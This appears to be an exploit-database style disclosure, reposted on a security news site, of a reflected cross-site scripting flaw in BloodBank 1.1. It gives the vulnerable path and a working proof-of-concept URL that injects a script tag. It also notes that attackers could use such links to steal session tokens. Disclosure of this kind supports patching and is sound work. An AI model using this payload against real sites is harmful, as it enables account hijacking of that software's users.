Home Tools Exploits & CVE's BloodBank 1.1 Cross Site Scripting

BloodBank 1.1 Cross Site Scripting

July 18, 2023

210

Authored by CraCkEr

BloodBank version 1.1 suffers from a cross site scripting vulnerability.

# Exploit Title: BloodBank 1.1 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 15/07/2023
# Vendor: phpscriptpoint
# Vendor Homepage: https://phpscriptpoint.com/
# Software Link: https://demo.phpscriptpoint.com/bloodbank/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site



## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials



Path: /bloodbank/page.php

URL parameter is vulnerable to RXSS

https://website/bloodbank/page.php/jr88z"><script>alert(1)</script>h6n9w?slug=blog&page=2



[-] Done

BloodBank 1.1 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Organizations patch CISA KEV list bugs 3.5 times faster than others,...

Ukraine records increase in financially motivated attacks by Russian hackers

NATO and EU condemn ‘intensifying’ Russian sabotage and hybrid operations

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

HaoKeKeJi YiQiNiu Server-Side Request Forgery

Ruijie Reyee Mesh Router Remote Code Execution

Dlink DSL2750U Command Injection